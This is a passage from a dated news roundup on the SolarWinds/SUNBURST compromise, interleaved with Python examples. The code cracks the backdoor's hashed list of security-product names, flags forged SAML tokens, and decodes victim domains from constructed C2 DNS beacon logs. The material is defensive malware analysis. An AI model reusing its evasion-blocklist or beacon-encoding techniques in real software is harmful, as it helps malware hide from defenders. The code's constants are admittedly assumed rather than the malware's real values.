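def fnv1a64(data: bytes) -> int:
    """Plain FNV-1a, 64-bit."""
    h = FNV64_OFFSET
    for b in data:
        h ^= b
        h = (h * FNV64_PRIME) & MASK64
    return h


def obfuscate(name: str, key: int = SUNBURST_XOR_KEY) -> int:
    """Transform a name the way the backdoor does before comparing it."""
    return fnv1a64(name.lower().encode("utf-8")) ^ key


def crack(hashes, wordlist, key: int = SUNBURST_XOR_KEY) -> dict:
    """Map each obfuscated hash to the candidate name that produces it."""
    targets = set(hashes)
    found = {}
    for word in wordlist:
        h = obfuscate(word, key)
        if h in targets:
            found[h] = word
    return found


# Constructed demo: three names a defender would expect to find hashed,
# and a wordlist that contains them among decoys.
DEMO_NAMES = ("msmpeng", "windefend", "cb")
DEMO_BLOCKLIST = [obfuscate(n) for n in DEMO_NAMES]
DEMO_WORDLIST = ["explorer", "msmpeng", "svchost", "windefend", "cb",
                 "csfalconservice", "lsass"]


def demo_crack() -> dict:
    return crack(DEMO_BLOCKLIST, DEMO_WORDLIST)


if __name__ == "__main__":
    for h, name in demo_crack().items():
        print(f"{h:#018x} -> {name}")
```

The same approach applies to any obfuscated string table whose inputs come from a small, guessable vocabulary: extract the constants from the sample, reimplement the transform, and run a wordlist of process, service, and driver names through it rather than trying to invert the hash.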


_______________________________________________________________________________________

(December 28, 2020)


NGSAST policy for Sunburst backdoor detection

A code repository has been put up on GitHub that provides the building blocks of an NG SAST policy for Sunburst backdoor detection. These ShiftLeft policy snippets can be used to detect the backdoor's code patterns in a codebase.

Ref - GitHub

_______________________________________________________________________________________

(December 28, 2020)


Microsoft shares information on using Microsoft 365 Defender to protect against Solorigate

Microsoft has published a comprehensive guide for security operations and incident response teams. This guide provides details about using Microsoft 365 Defender to identify, investigate, and respond to the recent Solorigate attack targeting the SolarWinds Orion platform.

Ref - Microsoft 

_______________________________________________________________________________________

(December 26, 2020)


SolarWinds releases updated advisory for new SUPERNOVA malware

SolarWinds has released an updated advisory for the additional SuperNova malware discovered to have been distributed through the company's network management platform.


_______________________________________________________________________________________

(December 26, 2020)


SolarWinds breach highlights several corporate governance gaps

The SolarWinds breach poses several urgent cybersecurity challenges for CIOs and boards. It highlights that boards' ability to monitor cyber risk is hampered by a lack of director expertise, outdated and incomplete committee charters, and highly diffused work responsibilities. Insufficient resources, weak oversight, and poor coordination make matters worse.

Ref - Forbes

_______________________________________________________________________________________

(December 26, 2020)


Security advisory to fix newly found remote command execution flaw in SolarWinds Orion platform

A security advisory has been released to fix a new vulnerability (CVE-2020-10148) that was probably targeted by a second hacker group to execute remote API commands on the targeted systems. This vulnerability could allow a remote attacker to bypass authentication and execute API commands which may result in a compromise of the SolarWinds instance.

Ref - CERT

_______________________________________________________________________________________

(December 25, 2020)


CrowdStrike releases a free Azure security tool after SolarWinds attack

CrowdStrike has released the free CrowdStrike Reporting Tool for Azure (CRT) to help administrators analyze their Microsoft Azure environment and see what privileges are assigned to third-party resellers and partners. The company was recently notified by Microsoft that, during the SolarWinds attacks, threat actors had attempted to read the company's emails through compromised Microsoft Azure credentials.


_______________________________________________________________________________________

(December 25, 2020)


A deep forensics investigation of SolarWinds supply-chain attack

A deep forensics investigation regarding SolarWinds supply chain attack has revealed another set of new details. The attackers had breached the SolarWinds source code management system in October 2019, and since then they not only deeply learned and tampered with the source code of SolarWinds but also learned the topology of their networks and internal development domain names to minimize the risk of getting noticed by security teams.


_______________________________________________________________________________________

(December 25, 2020)


SolarWinds issues urgent security fix

SolarWinds has updated its flagship Orion software, 11 days after revealing a major breach. On 13 December, it disclosed that Orion had been compromised, and used by suspected Russian attackers as a means to penetrate US government networks and companies including Intel. It was later revealed that the product had also been compromised by malware from a suspected second perpetrator, adding a separate backdoor.

Ref - BBC

_______________________________________________________________________________________

(December 25, 2020)


Solorigate attack affected critical infrastructure, including the power industry

The recent SolarWinds hacking attack that infected numerous government agencies and tech companies with malicious SolarWinds software has also infected more than a dozen critical infrastructure companies in the electric, oil, and manufacturing industries that were also running the software.


_______________________________________________________________________________________

(December 25, 2020)


Experts who wrestled with SolarWinds hackers say cleanup could take months - or longer

The attackers had not only managed to break back in, a common enough occurrence in the world of cyber incident response, but had sailed straight through to the client's email system. They even got past the recently refreshed password protections without any trouble. This indicates that the hackers were smart and sophisticated in nature.

Ref - Reuters

_______________________________________________________________________________________

(December 24, 2020)


CISA’s tool can detect malicious activity in the Azure/M365 environment impacted by SolarWinds attack

CISA has released a free tool, Sparrow, for detecting unusual and potentially malicious activity that threatens users and applications in an Azure/Microsoft 365 environment. The tool is intended for use by incident responders and is focused on the recent identity- and authentication-based attacks seen across multiple sectors. It comes after Microsoft disclosed that the SolarWinds threat actors were actively using stolen credentials and access tokens to target Azure customers.

Ref - US-CERT

_______________________________________________________________________________________

(December 24, 2020)


No taxpayer data is compromised by the recent SolarWinds breach

The internal watchdog at the IRS said in a letter that there is no evidence suggesting taxpayer information was exposed as a result of hackers breaching the agency's network. The IRS is conducting additional forensic reviews and network log analysis to collect more information.

Ref - FCW

_______________________________________________________________________________________

(December 24, 2020)

SolarWinds SUNBURST Backdoor: Inside the stealthy APT campaign

On December 13, FireEye shared valuable details on how the threat actors compromised the SolarWinds Orion software update distribution mechanism to push malicious code to organizations using the software.

Ref - Varonis

_______________________________________________________________________________________

(December 24, 2020)


Suspected Russian attackers used Microsoft vendors to target customers

The suspected Russian hackers behind the SolarWinds cyber-attack leveraged reseller access to Microsoft Corp services to penetrate targets that had no compromised network software from SolarWinds Corp. While updates to SolarWinds' Orion software were previously the only known point of entry, security company CrowdStrike Holdings Inc. stated that the hackers had also gained access to the vendor that sold it Office licenses and used that to try to read CrowdStrike's email.

Ref - Reuters

_______________________________________________________________________________________

(December 24, 2020)


Microsoft alerted CrowdStrike to hackers' attempted break-in

During the course of investigating the SolarWinds breach, CrowdStrike says, Microsoft uncovered an attempt by unidentified hackers to read emails linked with the company. The attackers tried to access emails; however, CrowdStrike said that it does not use Office 365 email as part of its IT architecture, so the attempt failed.


_______________________________________________________________________________________

(December 24, 2020)


Why does the SolarWinds hack matter so much?

Multiple networks have been penetrated in the SolarWinds breach, and it is now very expensive and difficult to secure all the affected systems. President Trump's former homeland security adviser stated that it could be years before the networks are secure again. With access to government networks, hackers could even destroy or alter data and impersonate legitimate people.


_______________________________________________________________________________________

(December 24, 2020)


SolarWinds attackers targeted local governments as well

CISA has disclosed that the SolarWinds hack not only affected key federal agencies but also targeted computer systems used by state and local governments, critical infrastructure entities, and other private sector organizations. CISA added that the Orion platform may not have been the only initial access vector.

Ref - NPR

_______________________________________________________________________________________

(December 24, 2020)


The massive data breach may have been discovered due to an 'unforced error' of attackers

Experts investigating the massive data breach related to SolarWinds said that the attackers were discovered possibly because they took more aggressive steps with calculated risk, months after their initial penetration. This led to a possible "unforced error" as they tried to expand their access within the network they had penetrated earlier without detection.

Ref - CNN

_______________________________________________________________________________________

(December 23, 2020)


Trustwave’s action response to the FireEye data breach & SolarWinds Orion compromise

This blog post provides information about Trustwave’s response to the FireEye tools breach and SolarWinds Orion platform compromise, as well as additional clarifications to Trustwave’s non-use of affected versions of SolarWinds Orion.

Ref - Trustwave

_______________________________________________________________________________________

(December 23, 2020)

Understanding & detecting the SUPERNOVA Webshell trojan

The sophisticated nature of the SolarWinds compromise has resulted in a flurry of new malware families, each with different characteristics and behaviors.


_______________________________________________________________________________________

(December 23, 2020)


SolarWinds victims need to report data breaches - UK privacy watchdog

U.K.'s Information Commissioner's Office (ICO) has warned the victim organizations of the SolarWinds attack that they are required to report data breaches within three days after their discovery. Organizations using the SolarWinds Orion IT management platform are asked to check if they are using the malicious builds - i.e., versions 2019.4 HF 5, 2020.2 with no hotfix installed, and 2020.2 HF 1. Affected organizations are required to inform the ICO within 72 hours of discovering the breach.


_______________________________________________________________________________________

(December 23, 2020)


The motive of SolarWinds attack could be beyond just espionage

Some experts suggest that the scope of SolarWinds attack extended beyond typical cyber-espionage, as the attackers dispersed their malicious code widely, even to potential targets with no obvious intelligence value. The attack may be extending to the “key utilities” in the U.S., and hackers may be still operating within breached networks, with the ability to conduct a more damaging attack, like deleting data or shutting down systems.

Ref - Bloomberg 

_______________________________________________________________________________________

(December 23, 2020)

How to Detect and Search for SolarWinds IOCs in LogRhythm

LogRhythm Labs has gathered up the indicators of compromise (IOCs) from CISA, Volexity, and FireEye associated with the recent SolarWinds supply chain attack and made them available in the GitHub repository.

Ref - LogRhythm

_______________________________________________________________________________________

(December 23, 2020)


US in talks with intelligence alliance partners for sharing intelligence and taking joint actions

White House National Security Adviser Robert O'Brien held a call with his counterparts in an international intelligence-sharing alliance to discuss the suspected Russian cyberattack on US government agencies. He also put a proposal for a joint statement condemning the breach with other members of the so-called Five Eyes alliance, which includes the US, UK, Canada, Australia, and New Zealand.

Ref - CNN 

_______________________________________________________________________________________

(December 23, 2020)


Five solution providers targeted with second-stage attacks

Five Solution Provider companies, namely Deloitte, Stratus Networks, Digital Sense, ITPS, and Netdecisions were specific targets of second-stage attacks during the SolarWinds attacks. Experts said that these companies should consider themselves compromised and conduct a full incident response investigation.

Ref - CRN 

_______________________________________________________________________________________

(December 23, 2020)


Millions of Devices Affected by Vulnerabilities Used in Stolen FireEye Tools

More than 7.5 million vulnerable instances have been identified that are exposed to the vulnerabilities targeted by the stolen FireEye tools and to the compromised versions of the SolarWinds Orion product. These vulnerable instances correspond to around 5.3 million unique assets belonging to more than 15,000 customers.

Ref - SecurityWeek 

_______________________________________________________________________________________

(December 22, 2020)

An analysis of SolarWinds Orion supply-chain attack

Disconnecting or turning off affected Orion devices is the only known mitigation measure currently available. CISA advises affected agencies to forensically image system memory and/or host operating systems hosting all instances of affected SolarWinds Orion versions and to analyze stored network traffic for indicators of compromise (IoCs). 

Ref - Logpoint

_______________________________________________________________________________________

(December 22, 2020)

Sunburst detection and investigation with Trend Micro products

This article covers various Trend Micro product detection and protection patterns, rules, and filters that have been deployed to help organizations investigate and mitigate additional risk against threats associated with this campaign as well as highlighting Trend Micro technology that can assist in the investigation.


_______________________________________________________________________________________

(December 22, 2020)


The SolarWinds cyberattack: What SLTTs need to know

This cyber-attack is exceptionally complex and continues to evolve. The attackers randomized parts of their actions making traditional identification steps such as scanning for known indicators of compromise (IOC) of limited value.

Ref - CIS

_______________________________________________________________________________________

(December 22, 2020)

SolarWinds hack breaches Treasury Department’s top levels

The Russian hackers behind the attack broke into the email system used by top officials at the Treasury Department in July. The Treasury Department ranks among the most highly protected corners of the government because of its responsibility for market-moving economic decisions, communications with the Federal Reserve, and economic sanctions against adversaries.

Ref - NYTimes

_______________________________________________________________________________________

(December 22, 2020)


Analysis of a supernova SolarWinds .NET Webshell 

In the IOCs listed by FireEye as part of this investigation related to supply-chain compromise of SolarWinds, a .NET webshell named SUPERNOVA was identified. There was no supplemental analysis as to its method of operation or any behavioral indications of this webshell being present in an environment.


_______________________________________________________________________________________

(December 22, 2020)


SolarWinds victims discovered after breaking the Sunburst malware DGA

Security researchers have shared lists of organizations where threat actors deployed Sunburst/Solarigate malware. To build the list of victims infected with the Sunburst backdoor via the compromised update mechanism of the SolarWinds Orion IT management platform, the researchers decoded a dynamically generated part of the C2 subdomain for each of the compromised devices.


_______________________________________________________________________________________

(December 21, 2020)


SolarWinds incident is a wakeup call for federal cybersecurity

CIOs and CISOs have spent a long week trying to get a handle on the impact on their networks, systems, and data from the SolarWinds cyber attack. While the details of the cyber breach continue to emerge and the agencies impacted come to light, Congress and the incoming administration of President-elect Joe Biden are promising to make 2021 an even busier year for CIOs and CISOs.


_______________________________________________________________________________________


(December 21, 2020)


SolarWinds hack: Microsoft leverages threat intelligence to identify patterns and new indicators 

As part of its ongoing response to the SolarWinds attack, Microsoft has been leveraging threat intelligence and monitoring for new indicators that could signal attacker activity. Two categories of anomalies have been detected: the first is SAML tokens being presented for access (for example tokens with unusual properties, or tokens not matching what the federation server actually issued), and the second is unusual Microsoft 365 API access patterns in a tenant.

Ref - Microsoft
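The first anomaly category above, SAML tokens presented for access, can be turned into concrete checks. The following Python is an added example, not code from Microsoft or from the original page: it parses SAML 2.0 assertions and flags a token lifetime longer than expected, a signing certificate that is not among the known token-signing certificates, an issuer that is not a trusted federation server, and an assertion ID that the identity provider never logged as issued (the case that catches a token forged with a stolen signing key, which otherwise looks normal). The one-hour threshold, the issuer name adfs.corp.example, the certificate blobs, the assertion IDs and the issuance log are all assumptions or constructed data.

```python
"""Added example: SAML assertion anomaly checks over constructed assertions.
Heuristics (long lifetime, unknown signing cert, untrusted issuer, assertion
ID absent from the IdP issuance log) are an assumed reading of the anomaly
categories, not Microsoft's detection logic; every name and blob is constructed."""
import base64
import hashlib
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta, timezone
from typing import Dict, List

NS = {"saml": "urn:oasis:names:tc:SAML:2.0:assertion",
      "ds": "http://www.w3.org/2000/09/xmldsig#"}
MAX_LIFETIME = timedelta(hours=1)  # assumed: typical federation-server default token lifetime
TRUSTED_ISSUER = "http://adfs.corp.example/adfs/services/trust"  # constructed
TRUSTED_ISSUERS = {TRUSTED_ISSUER}

# Constructed stand-ins for certificate DER bodies; a real thumbprint is SHA-1
# over the DER bytes that the X509Certificate element carries in base64.
KNOWN_CERT_B64 = base64.b64encode(b"DER of the legitimate token-signing certificate").decode()
ROGUE_CERT_B64 = base64.b64encode(b"DER of an attacker-minted signing certificate").decode()


def thumbprint(cert_b64: str) -> str:
    return hashlib.sha1(base64.b64decode(cert_b64)).hexdigest().upper()


KNOWN_THUMBPRINTS = {thumbprint(KNOWN_CERT_B64)}
IDP_ISSUED_IDS = {"_id-legit-1"}  # constructed IdP issuance log: assertion IDs it actually minted


def parse_ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def analyze_assertion(xml_text: str) -> List[str]:
    """Return anomaly descriptions for one SAML 2.0 assertion (empty list = nothing odd)."""
    root = ET.fromstring(xml_text)
    findings: List[str] = []
    issuer = root.findtext("saml:Issuer", default="", namespaces=NS)
    if issuer not in TRUSTED_ISSUERS:
        findings.append(f"issuer {issuer!r} is not a trusted federation server")
    cond = root.find("saml:Conditions", NS)
    if cond is None:
        findings.append("no Conditions element, so no validity window at all")
    else:
        lifetime = parse_ts(cond.get("NotOnOrAfter")) - parse_ts(cond.get("NotBefore"))
        if lifetime > MAX_LIFETIME:
            findings.append(f"lifetime {lifetime} exceeds expected maximum {MAX_LIFETIME}")
    cert = root.findtext(".//ds:X509Certificate", default="", namespaces=NS).strip()
    tp = thumbprint(cert) if cert else ""
    if tp not in KNOWN_THUMBPRINTS:
        findings.append(f"signing certificate {tp or '<none>'} is not a known token-signing cert")
    if root.get("ID") not in IDP_ISSUED_IDS:
        findings.append("assertion ID is absent from the identity provider's issuance log")
    return findings


def make_assertion(aid, issuer, subject, not_before, not_on_or_after, cert_b64) -> str:
    """Build a minimal SAML 2.0 assertion for the constructed samples (signature value omitted)."""
    return f"""<saml:Assertion xmlns:saml="{NS['saml']}" xmlns:ds="{NS['ds']}"
  ID="{aid}" Version="2.0" IssueInstant="{not_before}">
  <saml:Issuer>{issuer}</saml:Issuer>
  <ds:Signature><ds:KeyInfo><ds:X509Data>
    <ds:X509Certificate>{cert_b64}</ds:X509Certificate>
  </ds:X509Data></ds:KeyInfo></ds:Signature>
  <saml:Subject><saml:NameID>{subject}</saml:NameID></saml:Subject>
  <saml:Conditions NotBefore="{not_before}" NotOnOrAfter="{not_on_or_after}"/>
</saml:Assertion>"""


SAMPLE_ASSERTIONS = [
    # ordinary one-hour token, known cert, present in the issuance log
    make_assertion("_id-legit-1", TRUSTED_ISSUER, "alice@corp.example",
                   "2020-06-01T10:00:00Z", "2020-06-01T11:00:00Z", KNOWN_CERT_B64),
    # forged with an attacker-minted cert and a ten-hour window, never issued by the IdP
    make_assertion("_id-forged-1", TRUSTED_ISSUER, "svc-backup@corp.example",
                   "2020-06-01T10:00:00Z", "2020-06-01T20:00:00Z", ROGUE_CERT_B64),
    # forged with the stolen real key and a normal window: only the log correlation catches it
    make_assertion("_id-ghost-1", TRUSTED_ISSUER, "bob@corp.example",
                   "2020-06-02T09:00:00Z", "2020-06-02T10:00:00Z", KNOWN_CERT_B64),
]


def triage_assertions(assertions: List[str]) -> Dict[str, List[str]]:
    """Map each assertion ID to its list of findings."""
    return {ET.fromstring(a).get("ID"): analyze_assertion(a) for a in assertions}


if __name__ == "__main__":
    for aid, found in triage_assertions(SAMPLE_ASSERTIONS).items():
        print(aid, "clean" if not found else "; ".join(found))
```

The third sample is the important one: a token minted with the real, stolen signing key passes the lifetime and certificate checks, so the only signal is that the federation server has no record of issuing that assertion ID. In practice that correlation needs the identity provider's token-issuance audit events shipped to the same place as the application-side sign-in logs.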

_______________________________________________________________________________________

(December 21, 2020)

Responding to the SolarWinds Software Compromise in Industrial Environments

Far fewer than the 18,000 organizations that installed the trojanized update saw follow-on activity from the adversary; public data currently supports a number in the dozens, though the situation is evolving.

Ref - Dragos

_______________________________________________________________________________________

(December 21, 2020)

What We Have Learned So Far about the “Sunburst”/SolarWinds Hack

Based on SolarWinds' data, 33,000 organizations use the Orion software, and 18,000 were directly impacted by the malicious update.

Ref - Fortinet

_______________________________________________________________________________________

(December 21, 2020)


List of organizations affected with Sunburst malware released online

Multiple security researchers and research teams have published over the weekend lists ranging from 100 to 280 organizations that installed a trojanized version of the SolarWinds Orion platform. The biggest names on this list include the likes of Cisco, SAP, Intel, Cox Communications, Deloitte, Nvidia, Fujitsu, Belkin, Amerisafe, Lukoil, Rakuten, Check Point, Optimizely, Digital Reach, and Digital Sense.

Ref - ZDNet

_______________________________________________________________________________________

(December 21, 2020)

Another SUPERNOVA backdoor discovered in SolarWinds cyberattack 

While analyzing the artifacts from the SolarWinds Orion supply-chain attack, security researchers discovered another backdoor. Named SUPERNOVA, the malware is a webshell planted in the code of the Orion network and application monitoring platform. It is likely the work of a second threat actor, and it enabled adversaries to run arbitrary code on machines running the trojanized version of the software.


_______________________________________________________________________________________

(December 21, 2020)


A second threat group exploited SolarWinds systems

Security researchers have discovered a second threat actor, dubbed CosmicGale (aka Supernova), that exploited the SolarWinds software to plant malware on corporate and government networks. On infected networks, the originally detected Solorigate malware would ping its operators and then download a second-stage backdoor trojan named Teardrop, which allowed the attackers to start a hands-on-keyboard session, also known as a human-operated attack.

Ref - ZDNet

_______________________________________________________________________________________

(December 21, 2020)


Intel and Nvidia were targeted in the SolarWinds attack

Intel and Nvidia have joined the growing list of companies that have been swept up in the massive hacking campaign perpetrated through SolarWinds' Orion network monitoring software. The Santa Clara, Calif.-based chipmakers said in separate statements that they are investigating the impact of having downloaded a SolarWinds Orion software update containing malicious code.

Ref - CRN

_______________________________________________________________________________________

(December 21, 2020)


Detecting SUNBURST/Solarigate activity in retrospect with Zeek – a practical example

The threat actors who created SUNBURST went to extraordinary lengths to hide Command-and-Control (C2) traffic by mimicking the nature of communication patterns used by legitimate software within the SolarWinds package.


_______________________________________________________________________________________

(December 21, 2020)


The SolarWinds attackers could have targeted federated authentication

An attacker-modified update to the SolarWinds Orion network management product is likely not the only way the Russian attackers infiltrated networks. Specifically, US agencies are investigating incidents in which activity indicating abuse of Security Assertion Markup Language (SAML) tokens, consistent with this adversary's behavior, is present.

_______________________________________________________________________________________

(December 21, 2020)


The SolarWinds attack also affected a hospital and a university

It has been revealed that the suspected Russian hackers behind breaches at U.S. government agencies also gained access to major U.S. technology and accounting companies, at least one hospital, and a university. Along with access to tech companies, the attackers also had access to the California Department of State Hospitals and Kent State University.

Ref - WSJ

_______________________________________________________________________________________

(December 20, 2020)


Deloitte on the list of victims affected by the SolarWinds hack

It has been revealed that Deloitte, a British multinational professional services network, unwittingly downloaded software linked to a massive hack that targeted dozens of US government departments. The consulting firm installed SolarWinds Orion products, after which it was forced to take steps to protect itself from any risks.

Ref - Telegraph

_______________________________________________________________________________________

(December 20, 2020)


Around 50 firms are impacted by the SolarWinds massive breach

The cyber-security firm that identified the large-scale hacking of US government agencies says it genuinely impacted around 50 organizations. In addition, some 18,000 organizations had malicious code in their networks, out of which 50 suffered major breaches. The U.S. Secretary of State has blamed Russia for the hack.

Ref - BBC

_______________________________________________________________________________________

(December 19, 2020)

The SolarWinds cyberattack: The hack, the victims, and what we know

Since the SolarWinds supply chain attack was disclosed, there has been a whirlwind of news, technical details, and analysis released about the hack. Because the amount of information released in such a short time is overwhelming, the news outlet published a roundup of this week's SolarWinds news.


_______________________________________________________________________________________

(December 19, 2020)


Hackers conducted a test run of SolarWinds breach a year ago

Hackers who breached federal agency networks appear to have conducted a test run of their broad espionage campaign last year. The hackers distributed malicious files from the SolarWinds network in October 2019, five months before previously reported files were sent to victims through the company’s software-update servers.

Ref - Yahoo

_______________________________________________________________________________________

(December 19, 2020)


Russia is behind SolarWinds operation: US Secretary of State

US Secretary of State Mike Pompeo has blamed Russia for the recent attacks on U.S. federal agencies and private organizations in what is being described as the worst-ever cyber-espionage attack on the US government. He did not provide details about the alleged links to Moscow, and Russia has denied any involvement in the attack. 

Ref - BBC

_______________________________________________________________________________________

(December 19, 2020)


Sunburst malware used encoded DNS requests to talk to the C&C server 

In the initial phases of the recent SolarWinds hack, the Sunburst malware talks to the C&C server by sending encoded DNS requests. These requests contain information about the infected computer. If the attackers deem it interesting enough, the DNS response includes a CNAME record pointing to a second level C&C server. 
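The victim lists mentioned in the Dec 22 entry (SolarWinds victims discovered after breaking the Sunburst malware DGA) were produced by doing exactly what this entry describes in reverse: decoding the victim identifier from the beacon's query name and reading the answer to tell beacon-only hosts from those selected for follow-on activity. The following Python is an added example, not code from the original page, from FireEye or from SolarWinds. It implements a small custom-alphabet base32 codec, pulls the victim domain out of a beacon query name and classifies the resolver's answer. The alphabet, the label layout (a 16-character host ID followed by the encoded domain), the little-endian bit packing, the rule that a CNAME answer means the host was selected, the C2 zone c2-beacon.example and every log line are assumptions or constructed data, not the malware's real values; a working decoder for real traffic must use the alphabet and layout recovered from the sample.

```python
"""Added illustration of SUNBURST-style DNS beacon triage. Alphabet, label
layout, bit packing, the CNAME-means-selected rule, the C2 zone and the log
lines are assumed or constructed, not the malware's real values."""
from dataclasses import dataclass
from typing import Dict, Optional

ALPHABET = "ph2eifo3n5utg1j8d94qrvbmk0sal76c"  # assumed 32-symbol alphabet, index = 5-bit value
C2_ZONE = "c2-beacon.example"                   # constructed stand-in for the real C2 zone
HOST_ID_LEN = 16                                # assumed length of the per-host ID prefix


def b32_custom_encode(data: bytes) -> str:
    """Pack bytes little-endian and emit one alphabet symbol per 5 bits."""
    acc, nbits, out = 0, 0, []
    for b in data:
        acc |= b << nbits
        nbits += 8
        while nbits >= 5:
            out.append(ALPHABET[acc & 0x1F])
            acc >>= 5
            nbits -= 5
    if nbits:  # flush the final partial group
        out.append(ALPHABET[acc & 0x1F])
    return "".join(out)


def b32_custom_decode(label: str) -> bytes:
    """Inverse of b32_custom_encode; raises ValueError on symbols outside the alphabet."""
    acc, nbits, out = 0, 0, bytearray()
    for ch in label:
        val = ALPHABET.find(ch)
        if val < 0:
            raise ValueError(f"symbol {ch!r} is not in the alphabet")
        acc |= val << nbits
        nbits += 5
        while nbits >= 8:
            out.append(acc & 0xFF)
            acc >>= 8
            nbits -= 8
    return bytes(out)  # leftover bits (fewer than 8) are padding and are dropped


@dataclass
class Beacon:
    ts: str
    client: str
    host_id: str
    victim_domain: str
    selected: bool  # True when the answer was a CNAME (assumed stage-2 signal)


def parse_beacon(line: str) -> Optional[Beacon]:
    """Parse one constructed 'ts client qname atype adata' line; None if not a C2 beacon."""
    ts, client, qname, atype, _adata = line.split()
    if not qname.lower().endswith("." + C2_ZONE):
        return None
    label = qname.split(".")[0]
    host_id, encoded = label[:HOST_ID_LEN], label[HOST_ID_LEN:]
    try:
        victim = b32_custom_decode(encoded).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None  # label was not produced by this scheme
    if not victim or not all(c.isalnum() or c in ".-_" for c in victim):
        return None
    return Beacon(ts, client, host_id, victim, atype.upper() == "CNAME")


def triage(log: str) -> Dict[str, dict]:
    """Group beacons by decoded victim domain, noting host IDs and any stage-2 selection."""
    victims: Dict[str, dict] = {}
    for line in filter(str.strip, log.splitlines()):
        b = parse_beacon(line)
        if b is None:
            continue
        rec = victims.setdefault(b.victim_domain, {"hosts": set(), "selected": False})
        rec["hosts"].add(b.host_id)
        rec["selected"] = rec["selected"] or b.selected
    return victims


def make_label(host_id: str, victim_domain: str) -> str:
    return host_id + b32_custom_encode(victim_domain.encode("ascii"))  # builds sample labels


# Constructed DNS log: ts, client, query name, answer type, answer data.
SAMPLE_LOG = "\n".join([
    f"2020-06-12T03:14:07Z 10.1.2.3 {make_label('a1b2c3d4e5f60718', 'corp.victim-one.test')}.appsync.{C2_ZONE} A 20.140.0.1",
    f"2020-06-12T03:20:11Z 10.1.2.3 {make_label('a1b2c3d4e5f60718', 'corp.victim-one.test')}.appsync.{C2_ZONE} CNAME stage2.{C2_ZONE}",
    f"2020-06-12T04:02:55Z 10.9.8.7 {make_label('0f1e2d3c4b5a6978', 'lab.victim-two.test')}.appsync.{C2_ZONE} A 20.140.0.1",
    "2020-06-12T04:03:00Z 10.9.8.7 www.example.org A 93.184.216.34",
    f"2020-06-12T04:05:00Z 10.9.8.7 zzzzzzzzzzzzzzzzzzzz.appsync.{C2_ZONE} A 20.140.0.1",
])

if __name__ == "__main__":
    for domain, rec in triage(SAMPLE_LOG).items():
        print(domain, sorted(rec["hosts"]), "selected" if rec["selected"] else "beacon-only")
```

Run against passive DNS or resolver logs for the C2 zone, the same grouping yields a per-organization view: decoded domain, number of distinct beaconing hosts, and whether any host ever received the answer type that moves it to the next stage. The fourth and fifth sample lines show the two things a scanner must tolerate: ordinary queries to other zones, and labels under the C2 zone that do not decode under the assumed scheme.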


_______________________________________________________________________________________

(December 18, 2020)

Detecting SUNBURST Malware with Panther

Panther has published an addition to its open-source detections to actively track malware callbacks to the SUNBURST Indicators of Compromise (IoCs) identified by FireEye.

Ref - Panther

_______________________________________________________________________________________

(December 18, 2020)


Internal machines used by Cisco researchers were targeted in SolarWinds attack

Internal machines used by Cisco researchers were targeted via SolarWinds as the impact of the colossal hacking campaign on the tech sector becomes apparent. Roughly two dozen computers in a Cisco lab were compromised through malicious updates to SolarWinds’ Orion network monitoring platform. In this case, the perpetrators didn't just sneak in, but they broke in and covered their tracks by manipulating code, according to a cyber security expert familiar with the case.

Ref - CRN

_______________________________________________________________________________________

(December 18, 2020)

A Telecom organization and Fortune 500 company were breached in SolarWinds attack

A large telecommunications organization, a Fortune 500 company, and multiple government agencies are among the recent breaches to emerge as a result of the SolarWinds supply chain hack. SolarWinds estimates that between March and June, roughly 18,000 user organizations downloaded updates of its Orion software that Russian APT actors allegedly corrupted with Sunburst backdoor malware.


_______________________________________________________________________________________

(December 18, 2020)

A VMware flaw could be a vector in SolarWinds attack

The U.S. National Security Agency stated that Russian state-sponsored malicious cyber actors are exploiting a vulnerability in VMware Access and VMware Identity Manager products, allowing the actors to access protected data and abuse federated authentication. VMware released a software update to plug the security hole (CVE-2020-4006) on Dec. 3 and said it learned about the flaw from the NSA.


_______________________________________________________________________________________

(December 18, 2020)

Cozy Bear is suspected to be behind the SolarWinds breach

In the recent SolarWinds attacks, according to people familiar with the matter, the culprit is one of the most persistent and savvy hacking groups on the planet: the Russian government-backed APT29, also known as Cozy Bear. The U.S. government, however, has not formally blamed any group for the SolarWinds breach.


_______________________________________________________________________________________

(December 18, 2020)


Sunburst’s C2 unveiled additional SolarWinds victims

Examining the backdoor's DNS communications led researchers to identify two organizations, a government agency and a big U.S. telco, that were flagged for further exploitation in the spy campaign. Further exploitation by UNC2452 involves installing more malware, establishing persistence mechanisms, and exfiltrating data.


_______________________________________________________________________________________

(December 18, 2020)


A small number of UK organizations affected by SolarWinds hack

Suspected Russian hackers have compromised a small number of organizations in Britain after hijacking software updates issued by the U.S. IT firm SolarWinds Corp. Numbers in the UK are small and the organizations are not in the public sector, according to a UK security source.

Ref - Reuters

_______________________________________________________________________________________

(December 18, 2020)


SolarWinds hackers also breached a U.S. cable firm and a county government in Arizona 

Suspected Russian hackers accessed the systems of a U.S. internet provider and a county government in Arizona as part of a sprawling cyber-espionage campaign disclosed this week, according to an analysis of publicly-available web records.

Ref - Reuters

_______________________________________________________________________________________

(December 18, 2020)


SolarWinds attack is an act of recklessness - Microsoft president

Of the 18,000 organizations that downloaded a backdoored version of the software from SolarWinds, around 0.2 percent were targeted in a follow-on hack that used the backdoor to install a second-stage payload. The largest populations receiving stage two were tech companies, government agencies, and think tanks/NGOs; roughly 80 percent of these 40 chosen targets were located in the US. Microsoft's president called the operation an act of recklessness that has created a serious technological vulnerability for the United States and the world.


_______________________________________________________________________________________

(December 18, 2020)

A massive hack attack should be considered as an act of war: US lawmakers 

Several lawmakers in the U.S. are raising questions about whether the recent attack on the federal government widely attributed to Russia constitutes an act of war. This attack may represent one of the biggest cyberattacks in U.S. history. Questions have been raised about the fact that the U.S. has no clear cyber warfare strategy.

Ref - The Hill

_______________________________________________________________________________________

(December 18, 2020)


FBI, CISA confirm the US government hacks 

The compromise of multiple US federal networks following the SolarWinds breach was officially confirmed for the first time in a joint statement released earlier by the FBI, DHS-CISA, and the Office of the Director of National Intelligence (ODNI).


_______________________________________________________________________________________

(December 18, 2020)


Microsoft’s systems were vulnerable to SolarWinds hack

Microsoft Corp. said its systems were exposed to the malware used in the Russia-linked hack that targeted U.S. states and government agencies. Microsoft is itself a SolarWinds customer, and the company said that it found malicious code related to the cyber-attack in its own environment, which was isolated and removed. However, it found no evidence of access to production services or customer data.

Ref - Bloomberg

_______________________________________________________________________________________

(December 18, 2020)


More hacking attacks unearthed as officials alert the U.S. government 

